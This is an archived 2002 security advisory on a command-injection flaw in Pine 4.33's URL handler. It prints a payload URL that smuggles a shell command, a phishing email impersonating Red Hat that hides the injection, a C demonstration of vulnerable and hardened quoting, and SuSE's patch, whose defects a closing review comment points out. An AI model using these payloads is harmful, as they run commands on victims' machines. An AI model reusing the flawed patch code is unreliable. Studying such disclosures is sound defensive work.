TUCoPS :: Unix :: General :: unix4973.htm


Pine URL handler allows embedded commands
7th Jan 2002 [SBWID-4973]
COMMAND
	Pine URL handler allows embedded commands
SYSTEMS AFFECTED
	Pine 4.33 (at least)
PROBLEM
	Zen-parse posted:
	
	In Pine, if a user selects a URL of the form
	 
	 http://address/'&/some/program${IFS}with${IFS}arguments&'
	
	and URL handlers are installed, they will end up with the browser open
	on
	
	 http://address/
	
	and
	
	 /some/program with arguments
	
	will get executed.
	
	If you are reading your email as root these commands will execute
	as root. (Create an alias for root to a non-privileged user instead of
	reading mail as root.)
	
	If you are reading your email as a non-privileged user, the impact is
	somewhat lower, although local exploits could be run on the computer,
	or Outlook style email viruses could be executed. If you don't view
	links given to you in Pine, the impact from this problem is
	non-existent. It is possible to obfuscate the URL by putting it in an
	HTML message such as the following.
	
	----Begin html email----
	From: Redhat Network Security <rhnsecurity@redhat.com>
	To: undisclosed list <.@.>
	Subject: Urgent update required to PINE
	Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
	MIME-Version: 1.0
	Content-Type: TEXT/html
	Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
	Content-Length: 389
	Lines: 12
	
	<HTML>
	<BODY>
	Urgent update:<p>
	PINE allows execution of arbitrary commands.<p>
	
	<a href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/">
	http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
	<p>
	
	This link contains PINE update information. <p>
	
	You are advised to perform this immediately. <p>
	
	The link also contains other urgent update information. <p>
	
	</BODY>
	</HTML>
	----End html email----
	
	
	Which would appear something like
	
	
	----Begin view of email----
	
	Date: 22 Oct 2001 13:34:40 +1300
	From: Redhat Network Security <rhnsecurity@redhat.com>
	To: undisclosed list <.@.>
	Subject: Urgent update required to PINE
	
	Urgent update:
	
	PINE allows execution of arbitrary commands.
	
	http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
	e-in-pine-url-handler/
	
	This link contains PINE update information.
	
	You are advised to perform this immediately.
	
	The link also contains other urgent update information.
	
	----End view of email----
	
	
	When this link is selected to follow, Pine changes the status/menu
	lines to read:
	
	View selected URL "http://updates.redhat.com/update_information/urgent/r..." ? 
	Y [Yes] U editURL 
	N No A editApp 
	
	Which appears to match the url in the email. This probably makes
	detection of this kind of exploit attempt harder.
	
	
	
	-------------------------------------------------------------------------
	The preceding information is confidential and may not be redistributed
	without explicit permission. Legal action may be taken to enforce this. 
	If this message was posted by zen-parse@gmx.net to a public forum it may
	be redistributed as long as these conditions remain attached. If you are
	mum or dad, this probably doesn't apply to you.
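	The mechanism in miniature, as an added example that is not from zen-parse's post or from the Pine sources. Pine 4.33 wrapped a URL containing shell metacharacters in single quotes before handing the handler command to the shell, so a ' inside the URL closes the quoted region, the & or ; after it become command separators, and ${IFS} supplies the spaces a URL cannot carry. The program below builds the handler command the vulnerable way and two hardened ways (the SuSE approach used in the SOLUTION section, exporting the URL in an environment variable and referencing "$URL", and the alternative of escaping every embedded ' as '\'') and counts the separators a POSIX shell would see outside quoting for each. The handler name `lynx`, the function names and the simplified separator scanner (it models quotes and backslashes only) are assumptions for illustration.

```c
#define _POSIX_C_SOURCE 200809L /* setenv() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int setenv(const char *, const char *, int);   /* explicit, in case the feature macro is late */

#define CMD_MAX 1024

/* Constructed input: the URL from the post. The embedded ' closes the single
 * quotes the old code wraps the URL in; ${IFS} stands in for spaces. */
static const char *ZEN_URL = "http://address/'&/some/program${IFS}with${IFS}arguments&'";

/* Bounded append into out; -1 if the command would not fit. */
static int append(char *out, size_t outlen, size_t *pos, const char *s)
{
    size_t n = strlen(s);
    if (*pos + n >= outlen) return -1;
    memcpy(out + *pos, s, n);
    *pos += n;
    out[*pos] = '\0';
    return 0;
}

/* VULNERABLE: the Pine 4.33 scheme in miniature (handler with no explicit _URL_).
 * A URL holding one of Pine's "specials" is wrapped in single quotes, but a '
 * inside the URL ends the quoted region and the shell parses whatever follows. */
int build_cmd_vulnerable(const char *tool, const char *url, char *out, size_t outlen)
{
    size_t pos = 0;
    const char *q = strpbrk(url, "&*;<>?[|~$") ? "'" : "";
    if (append(out, outlen, &pos, tool) || append(out, outlen, &pos, " ") ||
        append(out, outlen, &pos, q) || append(out, outlen, &pos, url) ||
        append(out, outlen, &pos, q)) return -1;
    return 0;
}

/* HARDENED, SuSE style: the URL never touches the command line. It is exported
 * as $URL and the command says "$URL"; the shell expands that after parsing. */
int build_cmd_env(const char *tool, const char *url, char *out, size_t outlen)
{
    size_t pos = 0;
    if (setenv("URL", url, 1) != 0) return -1;
    if (append(out, outlen, &pos, tool) || append(out, outlen, &pos, " \"$URL\""))
        return -1;
    return 0;
}

/* HARDENED, escaping style: single-quote the value and rewrite each embedded
 * ' as '\'' so no byte of input can close the quote. */
int build_cmd_quoted(const char *tool, const char *url, char *out, size_t outlen)
{
    size_t pos = 0;
    char one[2] = {0, 0};
    if (append(out, outlen, &pos, tool) || append(out, outlen, &pos, " '"))
        return -1;
    for (const char *p = url; *p; p++) {
        one[0] = *p;
        if (append(out, outlen, &pos, *p == '\'' ? "'\\''" : one)) return -1;
    }
    return append(out, outlen, &pos, "'");
}

/* Count separators (; & | newline) a POSIX shell would see outside any quoting;
 * zero means the URL cannot smuggle in a second command. Simplified tokenizer. */
int unquoted_separators(const char *cmd)
{
    int in_sq = 0, in_dq = 0, n = 0;
    for (const char *p = cmd; *p; p++) {
        if (in_sq) { if (*p == '\'') in_sq = 0; }     /* '...' is fully literal */
        else if (*p == '\\' && p[1]) p++;              /* \x protects x */
        else if (in_dq) { if (*p == '"') in_dq = 0; }
        else if (*p == '\'') in_sq = 1;
        else if (*p == '"') in_dq = 1;
        else if (strchr(";&|\n", *p)) n++;
    }
    return n;
}

typedef int (*builder_fn)(const char *, const char *, char *, size_t);
/* Build the handler command with `build` and report leaked separators; -1 on error. */
int separators_after(builder_fn build, const char *tool, const char *url)
{
    char cmd[CMD_MAX];
    if (build(tool, url, cmd, sizeof cmd) != 0) return -1;
    return unquoted_separators(cmd);
}

int main(void)
{
    char cmd[CMD_MAX];
    build_cmd_vulnerable("lynx", ZEN_URL, cmd, sizeof cmd);
    printf("vulnerable: %d unquoted separator(s) in %s\n", unquoted_separators(cmd), cmd);
    build_cmd_env("lynx", ZEN_URL, cmd, sizeof cmd);
    printf("env:        %d unquoted separator(s) in %s  (URL=%s)\n", unquoted_separators(cmd), cmd, getenv("URL"));
    build_cmd_quoted("lynx", ZEN_URL, cmd, sizeof cmd);
    printf("quoted:     %d unquoted separator(s) in %s\n", unquoted_separators(cmd), cmd);
    return 0;
}
```

	With the zen-parse URL the vulnerable builder produces lynx 'http://address/'&/some/program${IFS}with${IFS}arguments&'' and the scanner reports two unquoted & separators; a URL that only contains ; or $ but no quote stays harmless under the old scheme, which is why the embedded ' is the essential part of the payload. The environment-variable form leaves the shell nothing to interpret regardless of the URL's bytes, and it is also the form to prefer over escaping, since escaping must be redone correctly for every shell dialect.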
	
SOLUTION
	Patch taken from the SuSE pine package by Olaf Kirch:
	
	
	Attachment pine-4.33-security.patch (MIME part Content-ID <Pine.LNX.4.43.0201071401050.22932@dent.suse.de>, base64 decoded to plain text):

--- pine/mailview.c.orig	Thu Oct 12 21:33:32 2000
+++ pine/mailview.c	Fri Oct 27 10:04:58 2000
@@ -3738,124 +3738,46 @@
 #define	URL_MAX_LAUNCH	(2 * MAILTMPLEN)
 
     if(handle->h.url.tool){
-	char	*toolp, *cmdp, *p, *q, cmd[URL_MAX_LAUNCH + 1];
-	char    *left_double_quote, *right_double_quote;
-	int	 mode, len, hlen, quotable = 0, copied = 0, double_quoted = 0;
+	char	*toolp, *cmdp, *endp, cmd[URL_MAX_LAUNCH + 1];
+	int	 mode, len, copied = 0;
 	PIPE_S *syspipe;
 
 	if((len = strlen(toolp = handle->h.url.tool)) > URL_MAX_LAUNCH)
 	  return(url_launch_too_long(rv));
 	  
-	hlen	 = strlen(handle->h.url.path);
-
 	/*
-	 * Figure out if we need to quote the URL. If there are shell
-	 * metacharacters in it we want to quote it, because we don't want
-	 * the shell to interpret them. However, if the user has already
-	 * quoted the URL in the command definition we don't want to quote
-	 * again. So, we try to see if there are a pair of unescaped
-	 * quotes surrounding _URL_ in the cmd.
-	 * If we quote when we shouldn't have, it'll cause it not to work.
-	 * If we don't quote when we should have, it's a possible security
-	 * problem (and it still won't work).
-	 *
-	 * In bash and ksh $( executes a command, so we use single quotes
-	 * instead of double quotes to do our quoting. If configured command
-	 * is double-quoted we change that to single quotes.
+	 * Rather than trying to be smart about quoting and
+	 * meta-characters, just stuff the URL into an environment
+	 * variable and make the handler use it.
 	 */
-#ifdef	_WINDOWS
-	if(*toolp == '*' || (*toolp == '\"' && *(toolp+1) == '*'))
-	  quotable = 0;		/* never quote */
-	else
-#endif
-	if(strpbrk(handle->h.url.path, "&*;<>?[|~$") != NULL){  /* specials? */
-	    if((p = strstr(toolp, "_URL_")) != NULL){  /* explicit arg? */
-		int in_quote = 0;
-
-		/* see whether or not it is already quoted */
-
-	        quotable = 1;
-
-		for(q = toolp; q < p; q++)
-		  if(*q == '\'' && (q == toolp || q[-1] != '\\'))
-		    in_quote = 1 - in_quote;
-		
-		if(in_quote){
-		    for(q = p+5; *q; q++)
-		      if(*q == '\'' && q[-1] != '\\'){
-			  /* already single quoted, leave it alone */
-			  quotable = 0;
-			  break;
-		      }
-		}
-
-		if(quotable){
-		    in_quote = 0;
-		    for(q = toolp; q < p; q++)
-		      if(*q == '\"' && (q == toolp || q[-1] != '\\')){
-			  in_quote = 1 - in_quote;
-			  if(in_quote)
-			    left_double_quote = q;
-		      }
-		    
-		    if(in_quote){
-			for(q = p+5; *q; q++)
-			  if(*q == '\"' && q[-1] != '\\'){
-			      /* we'll replace double quotes with singles */
-			      double_quoted = 1;
-			      right_double_quote = q;
-			      break;
-			  }
-		    }
-		}
-	    }
-	    else
-	      quotable = 1;
-	}
-	else
-	  quotable = 0;
+	setenv("URL", handle->h.url.path, 1);
+#define _URL_EXPANSION	"\"$URL\""
 
 	/* Build the command */
 	cmdp = cmd;
-	while(1)
-	  if((!*toolp && !copied)
-	     || (*toolp == '_' && !strncmp(toolp + 1, "URL_", 4))){
+	endp = cmd + sizeof(cmd) - 1;
+	do {
+	  if (cmdp + 1 > endp)
+	      return(url_launch_too_long(rv));
 
+	  if (!*toolp && !copied) {
 	      /* implicit _URL_ at end */
-	      if(!*toolp){
-		  *cmdp++ = ' ';
-		  len++;
-	      }
-
-	      /* add single quotes */
-	      if(quotable && !double_quoted){
-		  *cmdp++ = '\'';
-		  len += 2;
-	      }
+	      *endp++ = ' ';
+	      toolp = "_URL_";
+	  }
+
+	  if (strncmp(toolp, "_URL_", 5) != 0) {
+	     *cmdp++ = *toolp++;
+	  } else {
+		      toolp += 5; /* length of _URL_ */
 
-	      if((len += hlen) > URL_MAX_LAUNCH)
+	      if (cmdp + sizeof(_URL_EXPANSION) - 1 > endp)
 		return(url_launch_too_long(rv));
 
+	      sstrcpy(&cmdp, _URL_EXPANSION);
 	      copied = 1;
-	      sstrcpy(&cmdp, handle->h.url.path);
-	      if(quotable && !double_quoted){
-		  *cmdp++ = '\'';
-		  *cmdp = '\0';
-	      }
-
-	      if(*toolp)
-		toolp += 5;		/* length of "_URL_" */
-	  }
-	  else{
-	      /* replace double quotes with single quotes */
-	      if(double_quoted &&
-		 (toolp == left_double_quote || toolp == right_double_quote)){
-		  *cmdp++ = '\'';
-		  toolp++;
-	      }
-	      else if(!(*cmdp++ = *toolp++))
-		break;
 	  }
+	} while (*toolp);
 	
 	mode = PIPE_RESET | PIPE_USER ;
 	if(syspipe = open_system_pipe(cmd, NULL, NULL, mode, 0)){
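	Review bot: the rewritten build loop in this hunk no longer NUL-terminates cmd when the handler definition has text after the placeholder (for example `lynx _URL_ -dump`): the removed `else if(!(*cmdp++ = *toolp++)) break;` copied the terminator, but the new `do { ... } while (*toolp);` stops after the last real character and only `sstrcpy(&cmdp, _URL_EXPANSION)` writes a NUL, so cmd is terminated only when _URL_ is the final token; add `*cmdp = '\0';` after the loop. In the implicit-_URL_ branch `*endp++ = ' ';` stores the separating space in the last byte of cmd and moves endp one past the array instead of appending at cmdp: a bare handler such as `lynx` becomes `lynx"$URL"`, a single shell word, and the later check `cmdp + sizeof(_URL_EXPANSION) - 1 > endp` is now off by one, so sstrcpy's terminator can land one byte past cmd; this should read `*cmdp++ = ' ';` with endp left alone. Two smaller points: the return value of `setenv("URL", ...)` is ignored, and because _URL_ now expands to a double-quoted "$URL", a handler definition that already quotes the placeholder (the case the removed comment went to some length to handle) will pass the program the literal text $URL, which deserves either a check for surrounding quotes or a note in the package's release notes.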
	
